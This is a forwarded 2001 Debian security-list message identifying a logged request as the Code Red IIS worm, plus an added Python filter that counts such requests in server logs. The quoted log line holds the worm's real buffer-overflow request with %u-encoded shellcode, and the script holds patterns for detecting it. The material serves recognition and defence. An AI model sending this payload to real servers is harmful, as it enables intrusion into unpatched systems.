Here you go ...

----- Forwarded message from "Noah L. Meyerhans" <[EMAIL PROTECTED]> -----

Resent-Date: Thu, 19 Jul 2001 17:07:27 -0700 (PDT)
Delivered-To: [EMAIL PROTECTED]
X-Envelope-Sender: [EMAIL PROTECTED]
Date: Thu, 19 Jul 2001 18:54:31 -0400
To: Debian Security List <[EMAIL PROTECTED]>
Subject: Re: CGI Buffer Overflow?
User-Agent: Mutt/1.2.5i
In-Reply-To: <[EMAIL PROTECTED]>; from [EMAIL PROTECTED] on Thu, Jul 19, 2001 at 05:17:26PM -0400
From: "Noah L. Meyerhans" <[EMAIL PROTECTED]>
Resent-Message-ID: <NKZq7C.A.rV.AV2V7@murphy>
Resent-From: [EMAIL PROTECTED]
X-Mailing-List: <[EMAIL PROTECTED]> archive/latest/3334
X-Loop: [EMAIL PROTECTED]
Precedence: list
Resent-Sender: [EMAIL PROTECTED]

On Thu, Jul 19, 2001 at 05:17:26PM -0400, Brian Rectanus wrote:
> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a HTTP/1.0" 400 328

This is an IIS worm. It's running wild today...and I do mean wild. My
server has seen about 10 requests for it today. It's known as the Code
Red worm. There is some analysis of it at
http://www.eeye.com/html/advisories/codered.zip

If you're running IIS, be worried. Otherwise it's nothing.

noah

-- 
 _______________________________________________________
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html

----- End forwarded message -----
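
Added example, not part of the forwarded message: a small Python filter that counts requests of the shape quoted above (an `.ida` path, a long run of one filler character, then `%uXXXX` tokens) per source host and per response status. It assumes each Common Log Format entry sits on one line (the mail wrapped the quoted one); the thresholds of 100 filler characters and two `%u` tokens, and the sample lines with their addresses, are constructed for illustration.

```python
import re
from collections import Counter

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')
FILLER_RUN = re.compile(r'(.)\1{99,}')          # 100+ copies of one character
U_ENCODED = re.compile(r'%u[0-9a-fA-F]{4}')     # %uXXXX tokens as in the quoted request

def classify(line):
    """Return host/time/status for a request matching the pattern, else None."""
    m = CLF.match(line)
    if not m:
        return None
    host, when, request, status, _size = m.groups()
    parts = request.split(" ")
    if len(parts) < 2:
        return None
    path, _, query = parts[1].partition("?")
    if not path.lower().endswith(".ida"):
        return None
    if not FILLER_RUN.search(query) or len(U_ENCODED.findall(query)) < 2:
        return None
    return {"host": host, "time": when, "status": int(status)}

def summarize(lines):
    """Count matching requests per source host and per response status."""
    hits = [h for h in map(classify, lines) if h]
    return (Counter(h["host"] for h in hits),
            Counter(h["status"] for h in hits))

# Constructed sample lines (documentation address ranges, shortened payload).
PROBE = "/default.ida?" + "N" * 224 + "%u9090%u9090%u9090=a"
SAMPLE_LOG = [
    f'192.0.2.10 - - [19/Jul/2001:14:28:23 -0400] "GET {PROBE} HTTP/1.0" 400 328',
    '198.51.100.7 - - [19/Jul/2001:14:29:02 -0400] "GET /index.html HTTP/1.0" 200 1043',
    f'192.0.2.10 - - [19/Jul/2001:14:31:47 -0400] "GET {PROBE} HTTP/1.0" 400 328',
    '203.0.113.5 - - [19/Jul/2001:14:35:10 -0400] "GET /default.ida?page=1 HTTP/1.0" 404 276',
    f'203.0.113.9 - - [19/Jul/2001:14:40:55 -0400] "GET {PROBE} HTTP/1.0" 404 276',
]

if __name__ == "__main__":
    hosts, statuses = summarize(SAMPLE_LOG)
    for host, count in hosts.most_common():
        print(f"{host}: {count} matching request(s)")
    print("response statuses:", dict(statuses))
```

The status counts show how the server answered: on a non-IIS server such as the one in the quoted log, these requests end in 4xx responses.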
